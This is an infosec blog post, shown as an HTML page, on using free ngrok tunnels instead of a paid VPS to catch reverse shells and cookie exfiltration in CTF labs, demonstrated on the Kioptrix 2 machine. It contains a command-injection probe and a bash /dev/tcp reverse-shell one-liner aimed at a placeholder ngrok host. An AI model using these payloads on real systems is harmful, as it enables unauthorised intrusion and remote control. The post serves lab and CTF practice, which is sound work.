<!DOCTYPE html>
<html lang="">
	
	


	<head>
    <link href="https://gmpg.org/xfn/11" rel="profile">
    	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta http-equiv="Cache-Control" content="public" />
	<!-- Enable responsiveness on mobile devices -->
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
	
	    
	    
	    
	
	<title>Doing CTF without paying VPS • Just another infosec blog</title>
	
	
	<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Doing CTF without paying VPS"/>
<meta name="twitter:description" content="How to do some reverse shell or get XSS response on a remote host without paying for a VPS."/>

	<meta property="og:title" content="Doing CTF without paying VPS" />
<meta property="og:description" content="How to do some reverse shell or get XSS response on a remote host without paying for a VPS." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://maki.bzh/stupidthings/dontpayvps/" />
<meta property="article:published_time" content="2019-01-22T00:00:00&#43;00:00"/>
<meta property="article:modified_time" content="2019-01-22T00:00:00&#43;00:00"/>


    		
	
	
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/solarized-dark.min.css" integrity="sha256-90Y+fvi28WF+3jKH4tHEkoQ9WLeFKJjpvCPNOtU9ZvU= sha384-s+7l2WBKs5ChgZ+esoTV0aWZRcma7BxuSHlzBJz6PH4Cc4ZX3/ErQZtk+ZzYQy/X sha512-BiC3DH0qMCjCYqPNGAthQ95QCndm60uhfQVwhqZ2eG1zuGkP+3T1cw6PzEC4CiRfRIbd2qvyN39RoDfil/XcMA==" crossorigin="anonymous">
	
	
	

	<link rel="stylesheet" href="/css/hyde-hyde.css" integrity="sha256-cUUT8nKBmejGAmxYnpOnspTmwap5Sjc/nzRfeTTjgeQ=" crossorigin="anonymous">
	<link rel="stylesheet" href="/css/custom.css" >
	<link rel="stylesheet" href="/css/print.min.css" media="print" integrity="sha256-obkLPMZU5Kb+rPwjMazkJLfYW8H9dj6yh8Gzzs2dv5c=" crossorigin="anonymous">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js" integrity="sha256-3Jy/GbSLrg0o9y5Z5n1uw0qxZECH7C6OQpVBgNFYa0g= sha384-qFIkRsVO/J5orlMvxK1sgAt2FXT67og+NyFTITYzvbIP1IJavVEKZM7YWczXkwpB sha512-UDJtJXfzfsiPPgnI5S1000FPLBHMhvzAMX15I+qG2E2OAzC9P1JzUwJOfnypXiOH7MRPaqzhPbBGDNNj7zBfoA==" crossorigin="anonymous"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js" integrity="sha256-g6iAfvZp+nDQ2TdTR/VVKJf3bGro4ub5fvWSWVRi2NE= sha384-ZoaMbDF+4LeFxg6WdScQ9nnR1QC2MIRxA1O9KWEXQwns1G8UNyIEZIQidzb0T1fo sha512-qWVvreMuH9i0DrugcOtifxdtZVBBL0X75r9YweXsdCHtXUidlctw7NXg5KVP3ITPtqZ2S575A0wFkvgS2anqSA==" crossorigin="anonymous"></script>
    <![endif]-->
    <!-- Icons -->
    <link rel="shortcut icon" href="/favicon.png">
    	

</head>


	<body >
				
		<div class="sidebar">
			<div class="container sidebar-about ">
				<span class="site__title">
				
					<a href=""></a>
				</span>
				<a href="https://maki.bzh/">
					
					
					
					<div class="author-image">
						<img src="https://maki.bzh/img/maki.jpg" alt="Author Image" class="img--circle img--headshot element--center"/>
					</div>
					
				</a>
				<p class="site__description">
					<a href="https://maki.bzh/en">
						
					</a>
				</p>
				<div>
	<ul class="sidebar-nav">
		 
		 
			 
				<li>
					<a href="/articles/">
						<span>Articles</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/walkthrough/">
						<span>Walkthrough</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/stupidthings/">
						<span>Stupid Things</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/ctf/">
						<span>CTF</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/friends/">
						<span>Friends</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/whoami/">
						<span>Who Am I?</span>
					</a>
				</li>
			 
		
	</ul>
</div>

				
				<section class="social">
						
						<a href="https://twitter.com/maki_mitz" rel="me"><i class="rotate fab fa-twitter fa-lg" aria-hidden="true"></i></a>
						
						
						
						
						
						<a href="https://gitlab.com/maki_chaz" rel="me"><i class="rotate fab fa-gitlab fa-lg" aria-hidden="true"></i></a>
						
						
						
						
						
						
						
						
						
						
						<a href="mailto:Yml0ZWRlcG91bGV0" rel="me"><i class="rotate fas fa-at fa-lg" aria-hidden="true"></i></a>
						
						
					  &nbsp;<a href="https://www.root-me.org/Maki-37744" target="blank" class="linklogo"><div class="rotate rootme_logo logohover"></div></a>
					  
						
					  &nbsp;<a href="https://www.hackthebox.eu/home/users/profile/10265" target="blank" class="linklogo"><div class="rotate hackthebox_logo logohover"></div></a>
					  
						
					  &nbsp;<a href="https://www.aperikube.fr" target="blank" class="linklogo"><div class="rotate aperikube_logo logohover"></div></a>
					  
</section>

				
				
				<p class="copyright">
					&copy; 2020 Maki.
					<br/>
					<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Some Rights Reserved</a>.
					<br/>Built with, Haax, Laluka, _ACKNAK_
					<a href="https://gohugo.io">Hugo</a> ❤️ <a href="https://github.com/htr3n/hyde-hyde">hyde-hyde</a>.
					
				</p>
			</div>
		</div>

		<div class="content container">
			
	<article>
	<header>
		<h1>Doing CTF without paying VPS</h1>
		
		
<div class="post__meta">
	
	<i class="fas fa-calendar-alt"></i> Jan 22, 2019
	
	
	<br/>
	<i class="fas fa-clock"></i> 3 min read
</div>


	</header>
	<hr/>
	<div class="post">
		<nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#the-goal">The goal</a></li>
<li><a href="#how-it-works">How it works?</a></li>
<li><a href="#ngrok-installation">Ngrok installation</a></li>
<li><a href="#practical-example">Practical example</a></li>
<li><a href="#conclusion">Conclusion</a></li>
<li><a href="#resources">Resources</a></li>
</ul></li>
</ul>
</nav>
		

<h2 id="the-goal">The goal</h2>

<p>I think many of us do CTFs, but also many of us don&rsquo;t have any money, because we&rsquo;re student or addict to drugs. So when you don&rsquo;t have any money, you get creative.</p>

<p><center>
<img src="https://media.giphy.com/media/Km2YiI2mzRKgw/giphy.gif" alt="" />
</center></p>

<p>For webguys who are looking for a reverse shell or who want admin cookies on a remote host (hello root-me), but don&rsquo;t want to pay for a VPS, there is a free solution. Ngrok.</p>

<h2 id="how-it-works">How it works?</h2>

<p>Rather than making a super long and incomprehensible paragraph, here is a small diagram coming directly from the ngrok site:</p>

<p><center>
<img src="https://ngrok.com/static/img/demo.png" alt="" />
<em>Fig 1</em>: Secure connection from your localhost to ngrok servers
</center></p>

<p>So for our needs we will make a tcp tunnel between our port listening with netcat and ngrok. To listen on the internet and wait for remote data:</p>

<p><center>
<img src="/img/ngrokfreevps/douille.png" alt="" />
<em>Fig 2</em>: Connection from the remote target to your localhost
</center></p>

<p>Now, let&rsquo;s move on to practice.</p>

<h2 id="ngrok-installation">Ngrok installation</h2>

<p>All those step are explained on the ngrok website. But first, you need to create an account, it will have a unique identifier. You can put garbage:</p>

<ul>
<li>Username: bitedepoulet</li>
<li>Email address: bite@poulet.com</li>
<li>Password: ***********</li>
</ul>

<p>And then download the right archive, for me it&rsquo;s <code>Linux</code>: <a href="https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip">https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip</a></p>

<p>Unzip the archive, past the ngrok line with your private authtoken and we can start.</p>

<pre><code>▶ unzip ngrok-stable-linux-amd64.zip 
Archive:  ngrok-stable-linux-amd64.zip
  inflating: ngrok                   

▶ ./ngrok authtoken ENTERYOUROWN
Authtoken saved to configuration file: /home/maki/.ngrok2/ngrok.yml

▶ ./ngrok help                                                 
NAME:
   ngrok - tunnel local ports to public URLs and inspect traffic

DESCRIPTION:
    ngrok exposes local networked services behinds NATs and firewalls to the
[...]
</code></pre>

<p>It&rsquo;s successfully installed.</p>

<h2 id="practical-example">Practical example</h2>

<p>Ok, so I start a boot2root machine on <code>root-me.org</code>: kioptrix 2 (download link + WU in resource section).</p>

<p>Here is the RCE:</p>

<p><center>
<img src="/img/ngrokfreevps/kioptrix_rce.gif" alt="" />
<em>Fig 3</em>: Kioptrix 2 RCE
</center></p>

<p>Now, let&rsquo;s check which command are available for a reverse shell:</p>

<blockquote>
<p>; which nc python python2 python3 perl ruby php bash</p>
</blockquote>

<p><center>
<img src="/img/ngrokfreevps/kioptrix_available.png" alt="" />
<em>Fig 4</em>: Available command for reverse shell
</center></p>

<p>You can find lot of amazing payload on: <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a></p>

<p>We will use <code>bash</code> command with the following payload:</p>

<blockquote>
<p>bash -i &gt;&amp; /dev/tcp/NGROK_IP/NGROK_PORT 0&gt;&amp;1</p>
</blockquote>

<ul>
<li>NGROK_IP: Is the ngrok remote host with a domain like &ldquo;0.tcp.ngrok.io&rdquo;.</li>
<li>NGROK_PORT: The forwarding port associate to the ngrok remote host.</li>
</ul>

<p><center>
<img src="/img/ngrokfreevps/ngrok_rtcp.gif" alt="" />
<em>Fig 5</em>: Reverse shell using ngrok on a remote host
</center></p>

<p>I used <code>netcat</code> for my port listening, but you can use <code>python3 -m http.server 31337</code> to catch GET data with a real web server for example.</p>

<h2 id="conclusion">Conclusion</h2>

<p>This little trick allowed me to solve a lot of challenges without having a VPS. I hope you enjoyed this little blogpost :)</p>

<p>Feel free to ask me what you want on twitter @maki_chaz.</p>

<p>Happy hacking guys :D</p>

<h2 id="resources">Resources</h2>

<ol>
<li>Root-me, <strong>Une plateforme rapide, accessible et réaliste pour tester vos compétences en hacking.</strong>, <em>Root-me official website</em>: <a href="https://www.root-me.org/">https://www.root-me.org/</a></li>
<li>Ngrok team, <strong>What is ngrok?</strong>, <em>Official ngrok blog</em>: <a href="https://ngrok.com/product">https://ngrok.com/product</a></li>
<li>Vulnhub, <strong>Kioptrix: Level 1.1 (#2)</strong>, <em>Vulnhub team</em>: <a href="https://www.vulnhub.com/entry/kioptrix-level-11-2,23/">https://www.vulnhub.com/entry/kioptrix-level-11-2,23/</a></li>
<li>Abatchy, <strong>Kioptrix 2 Walktrhough (Vulnhub)</strong>, <em>abatchy&rsquo;s blog</em>: <a href="https://www.abatchy.com/2016/12/kioptrix-2-walkthrough-vulnhub.html">https://www.abatchy.com/2016/12/kioptrix-2-walkthrough-vulnhub.html</a></li>
<li>pentestmonkey, <strong>Reverse Shell Cheat Sheet</strong>, <em>pentestmonkey blog</em>: <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a></li>
</ol>

	</div>
</article>

		</div>
		
	
<script src="https://use.fontawesome.com/releases/v5.2.0/js/all.js" integrity="sha256-l1iMQ6f0+8aFBzSNRxgklLlYMqu5S4b/LpaST2s+gog= sha384-4oV5EgaV02iISL2ban6c/RmotsABqE4yZxZLcYMAdG7FAPsyHYAPpywE9PJo+Khy sha512-3dlGoFoY39YEcetqKPULIqryjeClQkr2KXshhYxFXNZAgRFZElUW9UQmYkmQE1bvB8tssj3uSKDzsj8rA04Meg==" crossorigin="anonymous"></script>


    
        
        
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw= sha384-ZeLYJ2PNSQjvogWP559CDAf02Qb8FE5OyQicqtz/+UhZutbrwyr87Be7NPH/RgyC sha512-ExaEi+x+Zqq50MIBraxsK23lQQJZd8Q7ZDlwJsxQwsWlO8XvRouQev9ZWaFxCKdTvrgb2fmf2pglwGp61/7qZA==" crossorigin="anonymous"></script>
	
        <script type="text/javascript">
            hljs.configure({languages: []});
            hljs.initHighlightingOnLoad();
        </script>
        
        



	


	<script>
    (function() {
      var toc = document.getElementById('TableOfContents');
      if (!toc) return;
      do {
        var li, ul = toc.querySelector('ul');
        if (ul.childElementCount !== 1) break;
        li = ul.firstElementChild;
        if (li.tagName !== 'LI') break;
        
        ul.outerHTML = li.innerHTML;
      } while (toc.childElementCount >= 1);
    })();
  </script>

	</body>
</html>
